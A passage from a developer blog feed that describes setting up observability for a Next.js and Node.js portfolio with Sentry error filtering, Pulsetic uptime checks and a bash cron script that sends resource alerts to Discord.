          &lt;span class="k"&gt;for &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;err&lt;/span&gt; &lt;span class="k"&gt;of&lt;/span&gt; &lt;span class="nx"&gt;errors&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;code&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;extensions&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;code&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="kc"&gt;undefined&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;AUTH_CODES&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;has&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;code&lt;/span&gt; &lt;span class="o"&gt;??&lt;/span&gt; &lt;span class="dl"&gt;''&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
              &lt;span class="nx"&gt;Sentry&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;captureException&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
          &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;},&lt;/span&gt;
      &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;],&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Frontend Gotcha: &lt;code&gt;instrumentation.ts&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This is the part that trips up almost everyone on Next.js 13+. It gave me more work than expected. You can install &lt;code&gt;@sentry/nextjs&lt;/code&gt;, add &lt;code&gt;sentry.client.config.ts&lt;/code&gt;, wrap your config with &lt;code&gt;withSentryConfig()&lt;/code&gt; - and still get zero frontend errors in Sentry.&lt;/p&gt;

&lt;p&gt;The missing piece: &lt;strong&gt;&lt;code&gt;frontend/src/instrumentation.ts&lt;/code&gt;&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// frontend/src/instrumentation.ts&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;register&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;NEXT_RUNTIME&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;nodejs&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="k"&gt;import&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;../sentry.server.config&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;NEXT_RUNTIME&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;edge&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="k"&gt;import&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;../sentry.edge.config&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This file is Next.js's official hook for initializing server-side code. Without it, Sentry's server/edge SDK never initializes, so SSR errors and API route errors silently vanish.&lt;/p&gt;

&lt;p&gt;You need three Sentry config files at the frontend root:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;frontend/
├── sentry.client.config.ts  ← browser-side errors + session replay
├── sentry.server.config.ts  ← SSR error capture
├── sentry.edge.config.ts    ← middleware error capture
└── src/
    └── instrumentation.ts   ← THE HOOK THAT WIRES IT ALL TOGETHER
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And &lt;code&gt;next.config.ts&lt;/code&gt; needs to be wrapped:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// frontend/next.config.ts&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;withSentryConfig&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@sentry/nextjs&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nf"&gt;withSentryConfig&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;sentryWebpackPluginOptions&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I also added &lt;code&gt;src/app/global-error.tsx&lt;/code&gt; to catch React rendering errors. Otherwise component-level crashes disappear without a trace.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 3: Pulsetic — External Uptime Monitoring
&lt;/h2&gt;

&lt;p&gt;Sentry tells you about code errors. Pulsetic tells you if the whole site is unreachable. These are different problems.&lt;/p&gt;

&lt;p&gt;Setup is 5 minutes:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a free account at &lt;a href="https://pulsetic.com" rel="noopener noreferrer"&gt;pulsetic.com&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Add monitor: &lt;code&gt;https://luisfaria.dev/health/ready&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Check interval: 60 seconds, regions: Sydney + US East&lt;/li&gt;
&lt;li&gt;Confirmation period: &lt;strong&gt;2 checks&lt;/strong&gt; (avoids false positives during rolling deploys)&lt;/li&gt;
&lt;li&gt;Alert channel: Discord webhook&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The key insight:&lt;/strong&gt; configure Pulsetic to alert on &lt;code&gt;503&lt;/code&gt;, not just timeouts. When MongoDB goes down, &lt;code&gt;/health/ready&lt;/code&gt; returns &lt;code&gt;503 degraded&lt;/code&gt; — not a network failure, but definitely something I want to know about.&lt;/p&gt;

&lt;p&gt;Requiring 2 consecutive failures prevents alert spam during a normal deploy. Containers restart, health checks briefly fail - that's expected. Two consecutive failures means something is actually broken.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 4: Cron Resource Monitor
&lt;/h2&gt;

&lt;p&gt;Sentry and Pulsetic cover errors and availability. But what about the server silently running out of disk space? Or memory creeping up after a week of traffic? Those kill a VPS quietly - no crash, no error, just degradation.&lt;/p&gt;

&lt;p&gt;I wrote a bash script that runs every 5 minutes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# server/monitor-resources.sh (simplified)&lt;/span&gt;
&lt;span class="c"&gt;# Thresholds: 85% for CPU, Mem, Disk&lt;/span&gt;
&lt;span class="c"&gt;# Alerts: Discord webhook&lt;/span&gt;
&lt;span class="c"&gt;# Dedup: 30-minute cooldown per alert type&lt;/span&gt;

&lt;span class="nv"&gt;DISCORD_WEBHOOK_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;DISCORD_WEBHOOK_URL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
&lt;span class="nv"&gt;THRESHOLD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;85
&lt;span class="nv"&gt;STATE_DIR&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"/var/lib/monitor"&lt;/span&gt;

check_memory&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
  &lt;span class="nb"&gt;local &lt;/span&gt;used_pct
  &lt;span class="nv"&gt;used_pct&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;free | &lt;span class="nb"&gt;awk&lt;/span&gt; &lt;span class="s1"&gt;'/^Mem:/ {printf "%.0f", $3/$2*100}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;[&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$used_pct&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;-gt&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$THRESHOLD&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
    &lt;/span&gt;send_alert_if_not_deduped &lt;span class="s2"&gt;"memory"&lt;/span&gt; &lt;span class="s2"&gt;"Memory at &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;used_pct&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;%"&lt;/span&gt;
  &lt;span class="k"&gt;fi&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;

check_docker&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
  &lt;span class="c"&gt;# Alert if any expected container is not running&lt;/span&gt;
  &lt;span class="k"&gt;for &lt;/span&gt;container &lt;span class="k"&gt;in &lt;/span&gt;frontend_webapp backend_api nginx_gateway mongodb_db redis_cache&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
    if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt; docker ps &lt;span class="nt"&gt;--format&lt;/span&gt; &lt;span class="s1"&gt;'{{.Names}}'&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-q&lt;/span&gt; &lt;span class="s2"&gt;"^&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;container&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;$"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;then
      &lt;/span&gt;send_alert_if_not_deduped &lt;span class="s2"&gt;"docker_&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;container&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="s2"&gt;"Container &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;container&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt; is down"&lt;/span&gt;
    &lt;span class="k"&gt;fi
  done&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The deduplication is the part I'm most proud of. Without it, a memory spike at 86% would fire an alert every 5 minutes until someone fixed it. With it, the first alert fires and then nothing for 30 minutes. The disk doesn't lie, but it doesn't need to shout either.&lt;/p&gt;

&lt;p&gt;Security model — because this runs with Docker socket access:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concern&lt;/th&gt;
&lt;th&gt;Solution&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Runs as&lt;/td&gt;
&lt;td&gt;Dedicated &lt;code&gt;monitor&lt;/code&gt; system user (no login shell)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Docker access&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;monitor&lt;/code&gt; added to &lt;code&gt;docker&lt;/code&gt; group (read-only monitoring)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Webhook secret&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;/etc/monitor/monitor.env&lt;/code&gt; (chmod 600, owned by &lt;code&gt;monitor&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logs&lt;/td&gt;
&lt;td&gt;Logrotate: daily rotation, 7-day retention&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Setup (on the server)&lt;/span&gt;
useradd &lt;span class="nt"&gt;--system&lt;/span&gt; &lt;span class="nt"&gt;--no-create-home&lt;/span&gt; &lt;span class="nt"&gt;--shell&lt;/span&gt; /usr/sbin/nologin monitor
usermod &lt;span class="nt"&gt;-aG&lt;/span&gt; docker monitor

&lt;span class="c"&gt;# Cron entry&lt;/span&gt;
&lt;span class="k"&gt;*&lt;/span&gt;/5 &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; monitor /opt/monitor/monitor-resources.sh &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /var/log/monitor-resources.log 2&amp;gt;&amp;amp;1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Real Data: First Sentry Weekly Report
&lt;/h2&gt;

&lt;p&gt;After running this for one week, the Sentry weekly email arrived:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Errors&lt;/th&gt;
&lt;th&gt;Transactions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Frontend (Next.js)&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;1,451&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Backend (Node.js)&lt;/td&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;270&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;23&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;1,721&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The 17 backend errors were mostly from testing the error-capture flow (I fired test exceptions during setup). The 6 frontend errors included a couple of ResizeObserver events that I subsequently filtered out.&lt;/p&gt;

&lt;p&gt;Most importantly: I could see which GraphQL resolvers were slow, which routes had errors, and exactly what the call stack looked like for each failure. Stack traces with source maps. Breadcrumbs showing what the user did before the crash. Session replay for frontend errors (1% of sessions, 100% of errored ones).&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Learned: SRE Concepts Applied
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concept&lt;/th&gt;
&lt;th&gt;Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Liveness probe&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;GET /health&lt;/code&gt; — always 200, load balancers use this&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Readiness probe&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;GET /health/ready&lt;/code&gt; — 200 or 503, Pulsetic targets this&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Internal diagnostics&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;GET /health/details&lt;/code&gt; — IP-whitelisted, CI pipeline uses this&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Error budget&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sentry free: 5K errors/month — if you hit this, something is very wrong&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Incident detection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pulsetic catches outages in &amp;lt; 2 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Alert fatigue&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;30-min dedup prevents Discord spam&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Least privilege&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Monitor script runs as &lt;code&gt;monitor&lt;/code&gt; user, not root&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Secret management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Webhook URL in restricted &lt;code&gt;/etc/monitor/monitor.env&lt;/code&gt; (chmod 600)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Graceful degradation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;503 with &lt;code&gt;"degraded"&lt;/code&gt; when a dependency is down, not a hard crash&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Observability pillars&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Logs (Winston) + Metrics (health/cron) + Traces (Sentry)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  The Alert Flow
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Error in code    → Sentry (instant)         → Sentry dashboard + email
Site goes down   → Pulsetic (&amp;lt; 2 min)       → Discord + email
CPU/Mem/Disk     → Cron script (every 5m)   → Discord (deduplicated)
Deploy fails     → GitHub Actions (instant)  → Discord (existing pipeline)
Container crash  → Cron script (every 5m)   → Discord (deduplicated)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. The &lt;code&gt;instrumentation.ts&lt;/code&gt; File Is Not Optional
&lt;/h3&gt;

&lt;p&gt;For Next.js 13+ (&lt;code&gt;/src&lt;/code&gt; directory structure), &lt;code&gt;frontend/src/instrumentation.ts&lt;/code&gt; is the initialization hook that wires Sentry into SSR and edge runtimes. Skip it and you get zero server-side error data.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Filter Before You Drown in Auth Noise
&lt;/h3&gt;

&lt;p&gt;Without &lt;code&gt;beforeSend&lt;/code&gt;, every 401/403 becomes a Sentry event. On an app with auth, that's most of your error budget. Filter &lt;code&gt;UNAUTHENTICATED&lt;/code&gt;, &lt;code&gt;FORBIDDEN&lt;/code&gt;, &lt;code&gt;BAD_USER_INPUT&lt;/code&gt; at the source.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. 503 Is Not "Down" — Design for Degradation
&lt;/h3&gt;

&lt;p&gt;Health checks that return 503 on dependency failures give uptime monitors something actionable. A binary "up/down" monitor misses the nuance of "site works but database is slow."&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Alert Deduplication Is Not Optional
&lt;/h3&gt;

&lt;p&gt;A 30-minute cooldown on resource alerts prevents alert fatigue. If your phone buzzes every 5 minutes for the same disk usage spike, you'll start ignoring it — which defeats the point.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Real Data Changes How You Think
&lt;/h3&gt;

&lt;p&gt;Before the weekly report, I thought about errors abstractly. After seeing "23 errors, 1.7k transactions," the numbers have names, stack traces, and user actions attached. That's the difference between guessing and knowing.&lt;/p&gt;




&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Error tracking&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sentry (free tier: 5K errors/mo)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Uptime monitoring&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pulsetic (free tier: 10 monitors)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Resource alerts&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Bash + cron + Discord webhook&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Health endpoints&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Express routes (already deployed)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Next.js + &lt;code&gt;@sentry/nextjs&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node.js + &lt;code&gt;@sentry/node&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;The full implementation is open source:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Live Site&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Open Source Repo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev" rel="noopener noreferrer"&gt;https://github.com/lfariabr/luisfaria.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Health Routes&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/backend/src/routes/health.ts" rel="noopener noreferrer"&gt;backend/src/routes/health.ts&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backend Sentry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/backend/src/instrument.ts" rel="noopener noreferrer"&gt;backend/src/instrument.ts&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend Sentry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/frontend/src/instrumentation.ts" rel="noopener noreferrer"&gt;frontend/src/instrumentation.ts&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cron Script&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/server/monitor-resources.sh" rel="noopener noreferrer"&gt;server/monitor-resources.sh&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Epic Tracker&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/issues/115" rel="noopener noreferrer"&gt;Issue #115 — Observability&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Let's Connect
&lt;/h2&gt;

&lt;p&gt;If you're building observability on a budget, working with Next.js + Node.js in production, or navigating Sentry's Next.js integration (that &lt;code&gt;instrumentation.ts&lt;/code&gt; gotcha gets everyone), I'd love to trade notes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Built with too many Discord pings and one very satisfying weekly Sentry email by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Whether it's concrete or code, structure is everything.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>sentry</category>
      <category>monitoring</category>
      <category>opensource</category>
      <category>observability</category>
    </item>
    <item>
      <title>My portfolio fetches NASA's Daily Space Photo - and never fails!</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Fri, 20 Feb 2026 07:44:47 +0000</pubDate>
